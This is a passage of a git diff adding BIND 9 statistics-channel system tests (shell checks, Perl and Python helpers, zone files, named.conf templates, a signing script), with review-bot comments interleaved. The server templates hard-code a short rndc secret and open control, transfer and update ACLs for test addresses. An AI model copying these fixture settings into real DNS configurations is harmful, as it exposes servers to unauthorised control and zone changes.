name=\"TCP4AcceptFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4BindFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4ConnFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4OpenFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4RecvErr\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP4SendErr\">0</counter>" stats.xml.out >/dev/null || ret=1 + + grep "<counter name=\"TCP6AcceptFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep 
"<counter name=\"TCP6BindFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6ConnFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6OpenFail\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6RecvErr\">0</counter>" stats.xml.out >/dev/null || ret=1 + grep "<counter name=\"TCP6SendErr\">0</counter>" stats.xml.out >/dev/null || ret=1 +else + echo_i "skipping test as libxml2 and/or curl and/or xsltproc was not found" +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "Check that 'zone-statistics full;' is processed by 'rndc reconfig' ($n)" +ret=0 +# off by default +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null && ret=0 +# turn on +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null || ret=1 +# turn off +copy_setports ns2/named.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null && ret=0 +# turn on +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reconfig ns2 10.53.0.2 +rndc_stats ns2 10.53.0.2 || ret=1 +sed -n '/Per Zone Query Statistics/,/^++/p' $last_stats | grep -F '[example]' > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/statschannel/clean.sh b/bin/tests/system/statschannel/clean.sh new file mode 100644 index 0000000..5ad2a2c --- /dev/null +++ b/bin/tests/system/statschannel/clean.sh 
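Review bot: In the final `zone-statistics full;` check, the two negative steps (`# off by default` and `# turn off`) end in `grep -F '[example]' > /dev/null && ret=0`, so finding the zone that should be absent clears `ret` instead of failing the test, and it also erases a failure recorded by the preceding `rndc_stats ns2 10.53.0.2 || ret=1`. Both lines should end in `grep -F '[example]' > /dev/null && ret=1`. Separately, the first two XML checks test `[ -x ${CURL} ]` unquoted, which evaluates true when CURL is empty and turns an intended skip into a failure; the third check already uses the quoted form `[ -x "${CURL}" ]`.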
@@ -0,0 +1,32 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f compressed.headers regular.headers compressed.out regular.out
+rm -f dig.out*
+rm -f ns*/managed-keys.bind*
+rm -f ns*/named.conf
+rm -f ns*/named.lock
+rm -f ns*/named.memstats
+rm -f ns*/named.run*
+rm -f ns*/named.stats
+rm -f ns*/signzone.out.*
+rm -f ns2/*.db.signed* ns2/dsset-*. ns2/*.jbk
+rm -f ns2/Kdnssec* ns2/dnssec.*.id
+rm -f ns2/Kmanykeys* ns2/manykeys.*.id
+rm -f ns2/dnssec.db.signed* ns2/dsset-dnssec.
+rm -f ns3/*.db
+rm -f traffic traffic.out.* traffic.json.* traffic.xml.*
+rm -f xml.*mem json.*mem
+rm -f xml.*stats json.*stats
+rm -f zones zones.out.* zones.json.* zones.xml.* zones.expect.*
+rm -rf ./__pycache__
diff --git a/bin/tests/system/statschannel/conftest.py b/bin/tests/system/statschannel/conftest.py
new file mode 100644
index 0000000..363dd7a
--- /dev/null
+++ b/bin/tests/system/statschannel/conftest.py
@@ -0,0 +1,25 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+import os
+import pytest
+
+
+@pytest.fixture
+def statsport(request):
+ # pylint: disable=unused-argument
+ env_port = os.getenv("EXTRAPORT1")
+ if env_port is None:
+ env_port = 5301
+ else:
+ env_port = int(env_port)
+
+ return env_port
diff --git a/bin/tests/system/statschannel/fetch.pl b/bin/tests/system/statschannel/fetch.pl
new file mode 100644
index 0000000..b09ed54
--- /dev/null
+++ b/bin/tests/system/statschannel/fetch.pl
@@ -0,0 +1,43 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# fetch.pl:
+# Simple script to fetch HTTP content from the statistics channel
+# of a BIND server. Fetches the full XML stats from 10.53.0.2 port
+# 8853 by default; these can be overridden by command line arguments.
+
+use File::Fetch;
+use Getopt::Std;
+
+sub usage {
+ print ("Usage: fetch.pl [-s address] [-p port] [path]\n");
+ exit 1;
+}
+
+my %options={};
+getopts("s:p:", \%options);
+
+my $addr = "10.53.0.2";
+$addr = $options{s} if defined $options{s};
+
+my $path = 'xml/v3';
+if (@ARGV >= 1) {
+ $path = shift @ARGV;
+}
+
+my $port = 8853;
+$port = $options{p} if defined $options{p};
+
+my $ff = File::Fetch->new(uri => "http://$addr:$port/$path");
+my $file = $ff->fetch() or die $ff->error;
+print ("$file\n");
diff --git a/bin/tests/system/statschannel/generic.py b/bin/tests/system/statschannel/generic.py
new file mode 100644
index 0000000..5ff09e2
--- /dev/null
+++ b/bin/tests/system/statschannel/generic.py
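Review bot: `my %options={};` in fetch.pl assigns a hash reference to a hash, which leaves one stray key (the stringified reference) in `%options` and would warn under `use warnings`; it should be `my %options = ();`. The script enables neither `use strict;` nor `use warnings;`, so mistakes like this stay silent. `usage` is also defined but never called: an unrecognised option falls through to a fetch with the default address and port, which `getopts("s:p:", \%options) or usage();` would prevent.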
@@ -0,0 +1,106 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+from datetime import datetime, timedelta
+import os
+
+
+# ISO datetime format without msec
+fmt = "%Y-%m-%dT%H:%M:%SZ"
+
+# The constants were taken from BIND 9 source code (lib/dns/zone.c)
+max_refresh = timedelta(seconds=2419200) # 4 weeks
+max_expires = timedelta(seconds=14515200) # 24 weeks
+now = datetime.utcnow().replace(microsecond=0)
+dayzero = datetime.utcfromtimestamp(0).replace(microsecond=0)
+
+
+# Generic helper functions
+def check_expires(expires, min_time, max_time):
+ assert expires >= min_time
+ assert expires <= max_time
+
+
+def check_refresh(refresh, min_time, max_time):
+ assert refresh >= min_time
+ assert refresh <= max_time
+
+
+def check_loaded(loaded, expected):
+ # Sanity check the zone timers values
+ assert loaded == expected
+ assert loaded < now
+
+
+def check_zone_timers(loaded, expires, refresh, loaded_exp):
+ # Sanity checks the zone timers values
+ if expires is not None:
+ check_expires(expires, now, now + max_expires)
+ if refresh is not None:
+ check_refresh(refresh, now, now + max_refresh)
+ check_loaded(loaded, loaded_exp)
+
+
+#
+# The output is gibberish, but at least make sure it does not crash.
+#
+def check_manykeys(name, zone=None):
+ # pylint: disable=unused-argument
+ assert name == "manykeys"
+
+
+def zone_mtime(zonedir, name):
+ try:
+ si = os.stat(os.path.join(zonedir, "{}.db".format(name)))
+ except FileNotFoundError:
+ return dayzero
+
+ mtime = datetime.utcfromtimestamp(si.st_mtime).replace(microsecond=0)
+
+ return mtime
+
+
+def test_zone_timers_primary(fetch_zones, load_timers, **kwargs):
+ statsip = kwargs["statsip"]
+ statsport = kwargs["statsport"]
+ zonedir = kwargs["zonedir"]
+
+ zones = fetch_zones(statsip, statsport)
+
+ for zone in zones:
+ (name, loaded, expires, refresh) = load_timers(zone, True)
+ mtime = zone_mtime(zonedir, name)
+ check_zone_timers(loaded, expires, refresh, mtime)
+
+
+def test_zone_timers_secondary(fetch_zones, load_timers, **kwargs):
+ statsip = kwargs["statsip"]
+ statsport = kwargs["statsport"]
+ zonedir = kwargs["zonedir"]
+
+ zones = fetch_zones(statsip, statsport)
+
+ for zone in zones:
+ (name, loaded, expires, refresh) = load_timers(zone, False)
+ mtime = zone_mtime(zonedir, name)
+ check_zone_timers(loaded, expires, refresh, mtime)
+
+
+def test_zone_with_many_keys(fetch_zones, load_zone, **kwargs):
+ statsip = kwargs["statsip"]
+ statsport = kwargs["statsport"]
+
+ zones = fetch_zones(statsip, statsport)
+
+ for zone in zones:
+ name = load_zone(zone)
+ if name == "manykeys":
+ check_manykeys(name)
diff --git a/bin/tests/system/statschannel/generic_dnspython.py b/bin/tests/system/statschannel/generic_dnspython.py
new file mode 100644
index 0000000..34a0398
--- /dev/null
+++ b/bin/tests/system/statschannel/generic_dnspython.py
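Review bot: `now` is fixed once at import time (`now = datetime.utcnow().replace(microsecond=0)`) and then used as a bound in `check_loaded` (`assert loaded < now`) and in `check_zone_timers`. A zone loaded or reloaded after this module is imported, or within the same second, would presumably fail the strict comparison for a reason unrelated to the statistics channel. Either take the timestamp inside `check_zone_timers`, or put a comment at the assignment stating that all servers must have finished loading before the module is imported. The comment in `check_loaded` repeats the one in `check_zone_timers`; something like `# loaded time must equal the zone file mtime and lie in the past` would describe what the two asserts check.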
@@ -0,0 +1,128 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+from collections import defaultdict
+
+import dns.message
+import dns.query
+import dns.rcode
+
+
+TIMEOUT = 10
+
+
+def create_msg(qname, qtype):
+ msg = dns.message.make_query(
+ qname, qtype, want_dnssec=True, use_edns=0, payload=4096
+ )
+
+ return msg
+
+
+def udp_query(ip, port, msg):
+ ans = dns.query.udp(msg, ip, TIMEOUT, port=port)
+ assert ans.rcode() == dns.rcode.NOERROR
+
+ return ans
+
+
+def tcp_query(ip, port, msg):
+ ans = dns.query.tcp(msg, ip, TIMEOUT, port=port)
+ assert ans.rcode() == dns.rcode.NOERROR
+
+ return ans
+
+
+def create_expected(data):
+ expected = {
+ "dns-tcp-requests-sizes-received-ipv4": defaultdict(int),
+ "dns-tcp-responses-sizes-sent-ipv4": defaultdict(int),
+ "dns-tcp-requests-sizes-received-ipv6": defaultdict(int),
+ "dns-tcp-responses-sizes-sent-ipv6": defaultdict(int),
+ "dns-udp-requests-sizes-received-ipv4": defaultdict(int),
+ "dns-udp-requests-sizes-received-ipv6": defaultdict(int),
+ "dns-udp-responses-sizes-sent-ipv4": defaultdict(int),
+ "dns-udp-responses-sizes-sent-ipv6": defaultdict(int),
+ }
+
+ for k, v in data.items():
+ for kk, vv in v.items():
+ expected[k][kk] += vv
+
+ return expected
+
+
+def update_expected(expected, key, msg):
+ msg_len = len(msg.to_wire())
+ bucket_num = (msg_len // 16) * 16
+ bucket = "{}-{}".format(bucket_num, bucket_num + 15)
+
+ expected[key][bucket] += 1
+
+
+def check_traffic(data, expected):
+ def ordered(obj):
+ if isinstance(obj, dict):
+ return sorted((k, ordered(v)) for k, v in obj.items())
+ if isinstance(obj, list):
+ return sorted(ordered(x) for x in obj)
+ return obj
+
+ ordered_data = ordered(data)
+ ordered_expected = ordered(expected)
+
+ assert len(ordered_data) == 8
+ assert len(ordered_expected) == 8
+ assert len(data) == len(ordered_data)
+ assert len(expected) == len(ordered_expected)
+
+ assert ordered_data == ordered_expected
+
+
+def test_traffic(fetch_traffic, **kwargs):
+ statsip = kwargs["statsip"]
+ statsport = kwargs["statsport"]
+ port = kwargs["port"]
+
+ data = fetch_traffic(statsip, statsport)
+ exp = create_expected(data)
+
+ msg = create_msg("short.example.", "TXT")
+ update_expected(exp, "dns-udp-requests-sizes-received-ipv4", msg)
+ ans = udp_query(statsip, port, msg)
+ update_expected(exp, "dns-udp-responses-sizes-sent-ipv4", ans)
+ data = fetch_traffic(statsip, statsport)
+
+ check_traffic(data, exp)
+
+ msg = create_msg("long.example.", "TXT")
+ update_expected(exp, "dns-udp-requests-sizes-received-ipv4", msg)
+ ans = udp_query(statsip, port, msg)
+ update_expected(exp, "dns-udp-responses-sizes-sent-ipv4", ans)
+ data = fetch_traffic(statsip, statsport)
+
+ check_traffic(data, exp)
+
+ msg = create_msg("short.example.", "TXT")
+ update_expected(exp, "dns-tcp-requests-sizes-received-ipv4", msg)
+ ans = tcp_query(statsip, port, msg)
+ update_expected(exp, "dns-tcp-responses-sizes-sent-ipv4", ans)
+ data = fetch_traffic(statsip, statsport)
+
+ check_traffic(data, exp)
+
+ msg = create_msg("long.example.", "TXT")
+ update_expected(exp, "dns-tcp-requests-sizes-received-ipv4", msg)
+ ans = tcp_query(statsip, port, msg)
+ update_expected(exp, "dns-tcp-responses-sizes-sent-ipv4", ans)
+ data = fetch_traffic(statsip, statsport)
+
+ check_traffic(data, exp)
diff --git a/bin/tests/system/statschannel/mem-xml.pl b/bin/tests/system/statschannel/mem-xml.pl
new file mode 100644
index 0000000..4483aae
--- /dev/null
+++ b/bin/tests/system/statschannel/mem-xml.pl
@@ -0,0 +1,21 @@
+#!/usr/bin/perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# server-xml.pl:
+# Parses the XML version of the server stats into a normalized format.
+
+use XML::Simple;
+use Data::Dumper;
+
+my $ref = XMLin("xml.mem");
+print Dumper($ref);
diff --git a/bin/tests/system/statschannel/ns1/example.db b/bin/tests/system/statschannel/ns1/example.db
new file mode 100644
index 0000000..5c2635e
--- /dev/null
+++ b/bin/tests/system/statschannel/ns1/example.db
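Review bot: The header comment in mem-xml.pl names a different script: it reads `# server-xml.pl:` and describes "server stats", while this file is mem-xml.pl and parses `xml.mem`. It should read `# mem-xml.pl:` followed by a line describing the input it actually reads (presumably the memory section of the statistics XML). The script also runs without `use strict;` and `use warnings;`, which would be worth adding above `use XML::Simple;`.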
@@ -0,0 +1,49 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+$ORIGIN example.
+a A 10.0.0.1
+ MX 10 mail.example.
+short TXT "short text"
+long TXT (
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ )
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/statschannel/ns1/named.conf.in b/bin/tests/system/statschannel/ns1/named.conf.in
new file mode 100644
index 0000000..04ead33
--- /dev/null
+++ b/bin/tests/system/statschannel/ns1/named.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify explicit;
+ minimal-responses no;
+ version none; // make statistics independent of the version number
+};
+
+statistics-channels { inet 10.53.0.1 port @EXTRAPORT1@ allow { localhost; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
diff --git a/bin/tests/system/statschannel/ns2/dnssec.db.in b/bin/tests/system/statschannel/ns2/dnssec.db.in
new file mode 100644
index 0000000..90ae166
--- /dev/null
+++ b/bin/tests/system/statschannel/ns2/dnssec.db.in
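Review bot: The `key rndc_key` block in ns1/named.conf.in carries a fixed, short secret (`secret "1234abcd8765";`), the control channel is opened with `allow { any; }`, and the zone sets `allow-transfer { any; }`. Nothing in the file says these settings are tolerable only because the server binds to the 10.53.0.1 test address. A comment above the key, e.g. `// test fixture only: fixed rndc secret and open ACLs; never reuse in a real named.conf`, would keep the file from being copied as a template. The same applies to ns2/named.conf.in and ns2/named2.conf.in later in this commit, which additionally set `allow-update { any; }` on the dnssec and manykeys zones.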
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300
+
+dnssec. IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+dnssec. NS ns2.dnssec.
+ns2.dnssec. A 10.53.0.2
+
+$ORIGIN dnssec.
+a A 10.0.0.1
+ MX 10 mail.dnssec.
+mail A 10.0.0.2
diff --git a/bin/tests/system/statschannel/ns2/example.db b/bin/tests/system/statschannel/ns2/example.db
new file mode 100644
index 0000000..5c2635e
--- /dev/null
+++ b/bin/tests/system/statschannel/ns2/example.db
@@ -0,0 +1,49 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+$ORIGIN example.
+a A 10.0.0.1
+ MX 10 mail.example.
+short TXT "short text"
+long TXT (
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ "longlonglonglonglonglonglonglonglonglong"
+ )
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/statschannel/ns2/manykeys.db.in b/bin/tests/system/statschannel/ns2/manykeys.db.in
new file mode 100644
index 0000000..3281a39
--- /dev/null
+++ b/bin/tests/system/statschannel/ns2/manykeys.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300
+
+manykeys. IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+manykeys. NS ns2.manykeys.
+ns2.manykeys. A 10.53.0.2
+
+$ORIGIN manykeys.
+a A 10.0.0.1
+ MX 10 mail.manykeys.
+mail A 10.0.0.2
diff --git a/bin/tests/system/statschannel/ns2/named.conf.in b/bin/tests/system/statschannel/ns2/named.conf.in
new file mode 100644
index 0000000..fd25fff
--- /dev/null
+++ b/bin/tests/system/statschannel/ns2/named.conf.in
@@ -0,0 +1,72 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ minimal-responses no;
+ version none; // make statistics independent of the version number
+};
+
+statistics-channels { inet 10.53.0.2 port @EXTRAPORT1@ allow { localhost; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+dnssec-policy "manykeys" {
+ keys {
+ ksk lifetime unlimited algorithm 8;
+ zsk lifetime unlimited algorithm 8;
+ ksk lifetime unlimited algorithm 13;
+ zsk lifetime unlimited algorithm 13;
+ ksk lifetime unlimited algorithm 14;
+ zsk lifetime unlimited algorithm 14;
+ };
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
+
+zone "dnssec" {
+ type primary;
+ file "dnssec.db.signed";
+ auto-dnssec maintain;
+ allow-update { any; };
+ zone-statistics full;
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+};
+
+zone "manykeys" {
+ type primary;
+ file "manykeys.db.signed";
+ allow-update { any; };
+ zone-statistics full;
+ dnssec-policy "manykeys";
+};
diff --git a/bin/tests/system/statschannel/ns2/named2.conf.in b/bin/tests/system/statschannel/ns2/named2.conf.in
new file mode 100644
index 0000000..d45f9f5
--- /dev/null
+++ b/bin/tests/system/statschannel/ns2/named2.conf.in
@@ -0,0 +1,68 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify no;
+ minimal-responses no;
+ version none; // make statistics independent of the version number
+};
+
+statistics-channels { inet 10.53.0.2 port @EXTRAPORT1@ allow { localhost; }; };
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+dnssec-policy "manykeys" {
+ keys {
+ ksk lifetime unlimited algorithm 8;
+ zsk lifetime unlimited algorithm 8;
+ };
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-transfer { any; };
+};
+
+zone "dnssec" {
+ type primary;
+ file "dnssec.db.signed";
+ auto-dnssec maintain;
+ allow-update { any; };
+ zone-statistics full;
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+};
+
+zone "manykeys" {
+ type primary;
+ file "manykeys.db.signed";
+ allow-update { any; };
+ zone-statistics full;
+ dnssec-policy "manykeys";
+};
diff --git a/bin/tests/system/statschannel/ns2/sign.sh b/bin/tests/system/statschannel/ns2/sign.sh
new file mode 100644
index 0000000..ab23550
--- /dev/null
+++ b/bin/tests/system/statschannel/ns2/sign.sh
@@ -0,0 +1,45 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+set -e
+
+zone=dnssec.
+infile=dnssec.db.in
+zonefile=dnssec.db.signed
+ksk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -f KSK "$zone")
+zsk=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" "$zone")
+# Sign deliberately with a very short expiration date.
+"$SIGNER" -P -S -x -O full -e "now"+1s -o "$zone" -f "$zonefile" "$infile" > "signzone.out.$zone" 2>&1
+keyfile_to_key_id "$ksk" > dnssec.ksk.id
+keyfile_to_key_id "$zsk" > dnssec.zsk.id
+
+zone=manykeys.
+infile=manykeys.db.in
+zonefile=manykeys.db.signed
+ksk8=$("$KEYGEN" -q -a RSASHA256 -b 2048 -f KSK "$zone")
+zsk8=$("$KEYGEN" -q -a RSASHA256 -b 2048 "$zone")
+ksk13=$("$KEYGEN" -q -a ECDSAP256SHA256 -b 256 -f KSK "$zone")
+zsk13=$("$KEYGEN" -q -a ECDSAP256SHA256 -b 256 "$zone")
+ksk14=$("$KEYGEN" -q -a ECDSAP384SHA384 -b 384 -f KSK "$zone")
+zsk14=$("$KEYGEN" -q -a ECDSAP384SHA384 -b 384 "$zone")
+# Sign deliberately with a very short expiration date.
+"$SIGNER" -S -x -O full -e "now"+1s -o "$zone" -f "$zonefile" "$infile" > "signzone.out.$zone" 2>&1
+keyfile_to_key_id "$ksk8" > manykeys.ksk8.id
+keyfile_to_key_id "$zsk8" > manykeys.zsk8.id
+keyfile_to_key_id "$ksk13" > manykeys.ksk13.id
+keyfile_to_key_id "$zsk13" > manykeys.zsk13.id
+keyfile_to_key_id "$ksk14" > manykeys.ksk14.id
+keyfile_to_key_id "$zsk14" > manykeys.zsk14.id
diff --git a/bin/tests/system/statschannel/ns3/named.conf.in b/bin/tests/system/statschannel/ns3/named.conf.in
